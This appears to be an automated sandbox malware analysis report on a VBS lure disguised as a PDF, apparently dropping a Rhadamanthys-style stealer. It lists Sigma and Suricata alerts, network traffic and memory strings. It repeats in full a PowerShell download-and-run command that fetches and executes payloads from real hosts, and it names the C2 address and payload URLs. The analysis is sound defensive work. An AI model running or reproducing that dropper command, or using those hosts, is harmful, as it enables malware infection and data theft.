                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/ef/ef.vbs' -destination 'C:\Users\Public\g8ix97hz.vbs';DownloadAndRun -url 'https://www.fornid.com/lm/List%20of%20required%20items%20and%20services.docx' -destination 'C:\Users\Public\rdc7di6ccs.docx', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/ef/ef.vbs' -destination 'C:\Users\Public\g8ix97hz.vbs';DownloadAndRun -url 'https://www.fornid.com/lm/List%20of%20required%20items%20and%20services.docx' -destination 'C:\Users\Public\rdc7di6ccs.docx', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items and services.pdf.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6788, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/ef/ef.vbs' -destination 'C:\Users\Public\g8ix97hz.vbs';DownloadAndRun -url 'https://www.fornid.com/lm/List%20of%20required%20items%20and%20services.docx' -destination 'C:\Users\Public\rdc7di6ccs.docx', ProcessId: 6904, ProcessName: powershell.exe
                        Sigma detected: Uncommon Svchost Parent Process
                        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Windows\SysWOW64\msiexec.exe", ParentImage: C:\Windows\SysWOW64\msiexec.exe, ParentProcessId: 5228, ParentProcessName: msiexec.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 2188, ProcessName: svchost.exe
                        Sigma detected: Usage Of Web Request Commands And Cmdlets
                        Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/ef/ef.vbs' -destination 'C:\Users\Public\g8ix97hz.vbs';DownloadAndRun -url 'https://www.fornid.com/lm/List%20of%20required%20items%20and%20services.docx' -destination 'C:\Users\Public\rdc7di6ccs.docx', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/ef/ef.vbs' -destination 'C:\Users\Public\g8ix97hz.vbs';DownloadAndRun -url 'https://www.fornid.com/lm/List%20of%20required%20items%20and%20services.docx' -destination 'C:\Users\Public\rdc7di6ccs.docx', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items and services.pdf.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6788, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/ef/ef.vbs' -destination 'C:\Users\Public\g8ix97hz.vbs';DownloadAndRun -url 'https://www.fornid.com/lm/List%20of%20required%20items%20and%20services.docx' -destination 'C:\Users\Public\rdc7di6ccs.docx', ProcessId: 6904, ProcessName: powershell.exe
                        Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                        Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items and services.pdf.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items and services.pdf.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items and services.pdf.vbs", ProcessId: 6788, ProcessName: wscript.exe
                        Sigma detected: Non Interactive PowerShell Process Spawned
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/ef/ef.vbs' -destination 'C:\Users\Public\g8ix97hz.vbs';DownloadAndRun -url 'https://www.fornid.com/lm/List%20of%20required%20items%20and%20services.docx' -destination 'C:\Users\Public\rdc7di6ccs.docx', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/ef/ef.vbs' -destination 'C:\Users\Public\g8ix97hz.vbs';DownloadAndRun -url 'https://www.fornid.com/lm/List%20of%20required%20items%20and%20services.docx' -destination 'C:\Users\Public\rdc7di6ccs.docx', CommandLine|base64offset|contains: &, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of required items and services.pdf.vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 6788, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.astenterprises.com.pk/ef/ef.vbs' -destination 'C:\Users\Public\g8ix97hz.vbs';DownloadAndRun -url 'https://www.fornid.com/lm/List%20of%20required%20items%20and%20services.docx' -destination 'C:\Users\Public\rdc7di6ccs.docx', ProcessId: 6904, ProcessName: powershell.exe
                        Sigma detected: Windows Processes Suspicious Parent Directory
                        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 4888, ProcessName: svchost.exe

                        Suricata Signatures

                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-18T19:27:42.108937+010028548242Potentially Bad Traffic87.120.127.2153847192.168.2.449901TCP
                        2024-12-18T19:27:53.874031+010028548242Potentially Bad Traffic87.120.127.2153847192.168.2.449927TCP
                        2024-12-18T19:28:08.427647+010028548242Potentially Bad Traffic87.120.127.2153847192.168.2.449958TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-18T19:27:08.946685+010028032702Potentially Bad Traffic192.168.2.449809202.71.109.228443TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2024-12-18T19:27:17.775005+010028548021Domain Observed Used for C2 Detected87.120.127.2153847192.168.2.449840TCP
                        2024-12-18T19:27:42.108937+010028548021Domain Observed Used for C2 Detected87.120.127.2153847192.168.2.449901TCP
                        2024-12-18T19:27:53.874031+010028548021Domain Observed Used for C2 Detected87.120.127.2153847192.168.2.449927TCP
                        2024-12-18T19:28:08.427647+010028548021Domain Observed Used for C2 Detected87.120.127.2153847192.168.2.449958TCP

                        Joe Sandbox Signatures

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        AI detected suspicious sample
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3B860F0 CryptUnprotectData,21_2_00007DF4F3B860F0
                        Source: unknownHTTPS traffic detected: 107.161.23.150:443 -> 192.168.2.4:49730 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 202.71.109.228:443 -> 192.168.2.4:49732 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 93.95.216.175:443 -> 192.168.2.4:49739 version: TLS 1.2
                        Source: unknownHTTPS traffic detected: 202.71.109.228:443 -> 192.168.2.4:49809 version: TLS 1.2
                        Source: Binary string: m.Core.pdbc source: powershell.exe, 0000000B.00000002.2197252164.00000000075E0000.00000004.00000020.00020000.00000000.sdmp
                        Source: C:\Windows\System32\svchost.exeCode function: 21_2_00007DF4F3B80B80 FindFirstFileW,DeleteFileW,FindNextFileW,RemoveDirectoryW,21_2_00007DF4F3B80B80
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA
                        Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local

                        Software Vulnerabilities

                        barindex
                        Suspicious execution chain found
                        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        Source: C:\Windows\System32\svchost.exeCode function: 4x nop then dec esp21_2_0000022C9E060511
                        Source: C:\Windows\System32\svchost.exeCode function: 4x nop then dec esp21_2_00007DF4F3B91741
                        Source: C:\Program Files\Windows Media Player\wmprph.exeCode function: 4x nop then dec esp25_2_0000017161855681
                        Source: chrome.exeMemory has grown: Private usage: 1MB later: 19MB
                        Source: winword.exeMemory has grown: Private usage: 1MB later: 79MB

                        Networking

                        barindex
                        Suricata IDS alerts for network traffic
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 87.120.127.215:3847 -> 192.168.2.4:49840
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 87.120.127.215:3847 -> 192.168.2.4:49927
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 87.120.127.215:3847 -> 192.168.2.4:49958
                        Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 87.120.127.215:3847 -> 192.168.2.4:49901
                        System process connects to network (likely due to code injection or exploit)
                        Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 87.120.127.215 3847
                        Source: unknownNetwork traffic detected: IP country count 10
                        Source: global trafficTCP traffic: 192.168.2.4:49840 -> 87.120.127.215:3847
                        Source: Joe Sandbox ViewIP Address: 129.6.15.28 129.6.15.28
                        Source: Joe Sandbox ViewIP Address: 202.71.109.228 202.71.109.228
                        Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                        Source: Network trafficSuricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 87.120.127.215:3847 -> 192.168.2.4:49927
                        Source: Network trafficSuricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 87.120.127.215:3847 -> 192.168.2.4:49958
                        Source: Network trafficSuricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 87.120.127.215:3847 -> 192.168.2.4:49901
                        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49809 -> 202.71.109.228:443
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: unknownTCP traffic detected without corresponding DNS query: 87.120.127.215
                        Source: global trafficHTTP traffic detected: GET /ef/ef.vbs HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.astenterprises.com.pkConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /ef/Skifterne.sea HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.tdejb.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /lm/List%20of%20required%20items%20and%20services.docx HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.fornid.comConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /ef/ef.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: www.tdejb.comCache-Control: no-cache
                        Source: global trafficDNS traffic detected: DNS query: www.astenterprises.com.pk
                        Source: global trafficDNS traffic detected: DNS query: www.tdejb.com
                        Source: global trafficDNS traffic detected: DNS query: www.fornid.com
                        Source: global trafficDNS traffic detected: DNS query: ts1.aco.net
                        Source: global trafficDNS traffic detected: DNS query: gbg1.ntp.se
                        Source: global trafficDNS traffic detected: DNS query: time-a-g.nist.gov
                        Source: global trafficDNS traffic detected: DNS query: ntp.nict.jp
                        Source: global trafficDNS traffic detected: DNS query: ntp1.net.berkeley.edu
                        Source: global trafficDNS traffic detected: DNS query: x.ns.gin.ntt.net
                        Source: global trafficDNS traffic detected: DNS query: ntp1.hetzner.de
                        Source: powershell.exe, 00000001.00000002.2988265247.0000023D82F68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://astenterprises.com.pk
                        Source: powershell.exe, 00000001.00000002.3143149575.0000023D99D0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro
                        Source: svchost.exe, 0000000F.00000002.2993557026.0000012632E00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                        Source: wscript.exe, 00000003.00000003.1764019779.00000127C8A8A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1761542251.00000127C8A89000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1761425230.00000127C8A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1762565685.00000127C8A89000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
                        Source: wscript.exe, 00000003.00000003.1787825800.00000127C6A3D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1769341795.00000127C6A27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1768924746.00000127C6A27000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1786749738.00000127C6A30000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1767953235.00000127C6A28000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1789523077.00000127C6A3D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
                        Source: wscript.exe, 00000003.00000003.1787825800.00000127C6A78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1768924746.00000127C6A78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1769341795.00000127C6A78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1786749738.00000127C6A78000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1767953235.00000127C6A78000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                        Source: wscript.exe, 00000003.00000003.1761458588.00000127C8A49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1765468533.00000127C8A49000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1764062911.00000127C8A49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab;
                        Source: wscript.exe, 00000003.00000003.1761542251.00000127C8A89000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1762854115.00000127C6A8C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1761425230.00000127C8A86000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1764745506.00000127C6AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?3b20f67407a05
                        Source: wscript.exe, 00000003.00000003.1762854115.00000127C6A8C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1764745506.00000127C6AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com:80/msdownload/update/v3/static/trustedr/en/authrootstl.cab?3b20f67407
                        Source: svchost.exe, 0000000F.00000003.2038947683.0000012633018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                        Source: svchost.exe, 0000000F.00000003.2038947683.0000012633018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                        Source: svchost.exe, 0000000F.00000003.2038947683.0000012633018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                        Source: svchost.exe, 0000000F.00000003.2038947683.0000012633018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                        Source: svchost.exe, 0000000F.00000003.2038947683.0000012633018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                        Source: svchost.exe, 0000000F.00000003.2038947683.0000012633018000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                        Source: svchost.exe, 0000000F.00000003.2038947683.000001263304D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                        Source: svchost.exe, 0000000F.00000003.2038947683.0000012633091000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                        Source: powershell.exe, 00000001.00000002.2988265247.0000023D83336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://fornid.com
                        Source: powershell.exe, 00000001.00000002.3118863696.0000023D91B31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2988265247.0000023D833C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3118863696.0000023D919FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1948506548.0000020190070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                        Source: powershell.exe, 00000006.00000002.1929100523.0000020180225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                        Source: powershell.exe, 00000001.00000002.3143149575.0000023D99D62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/docPropsVTypes
                        Source: powershell.exe, 00000001.00000002.3143149575.0000023D99D62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/extendedProperties
                        Source: powershell.exe, 00000001.00000002.3137535140.0000023D99ADC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/extendedPropertiespro
                        Source: powershell.exe, 00000001.00000002.3143149575.0000023D99D62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/officeDocument/relationships/officeDocument
                        Source: powershell.exe, 00000001.00000002.3137535140.0000023D99A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/wordprocessingml/mainWiw=
                        Source: powershell.exe, 00000001.00000002.3137535140.0000023D99A90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://purl.oclc.org/ooxml/wordprocessingml/mainw
                        Source: powershell.exe, 00000001.00000002.2988265247.0000023D81981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1929100523.0000020180001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2160349963.0000000004A31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: powershell.exe, 00000006.00000002.1956381312.00000201E8542000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://st.co
                        Source: powershell.exe, 00000006.00000002.1929100523.0000020181C6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tdejb.com
                        Source: powershell.exe, 00000006.00000002.1929100523.0000020180225000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                        Source: powershell.exe, 00000001.00000002.2988265247.0000023D82F68000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.astenterprises.com.pk
                        Source: powershell.exe, 00000001.00000002.2988265247.0000023D83336000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fornid.com
                        Source: powershell.exe, 00000006.00000002.1929100523.0000020181C6E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tdejb.com
                        Source: svchost.exeString found in binary or memory: https://87.120.127.215:3847/6d41b386417b9c328d8/i4rtpd4n.psnut
                        Source: powershell.exe, 00000001.00000002.2988265247.0000023D81981000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1929100523.0000020180001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: powershell.exe, 0000000B.00000002.2160349963.0000000004A31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lBfq
                        Source: powershell.exe, 00000006.00000002.1948506548.0000020190070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 00000006.00000002.1948506548.0000020190070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 00000006.00000002.1948506548.0000020190070000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: svchost.exe, 0000000F.00000003.2038947683.00000126330C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                        Source: svchost.exe, 0000000F.00000003.2038947683.000001263311A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                        Source: svchost.exe, 0000000F.00000003.2038947683.00000126330C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                        Source: svchost.exe, 0000000F.00000003.2038947683.00000126330A3000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.2038947683.00000126330F4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
                        Source: svchost.exe, 0000000F.00000003.2038947683.00000126330C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
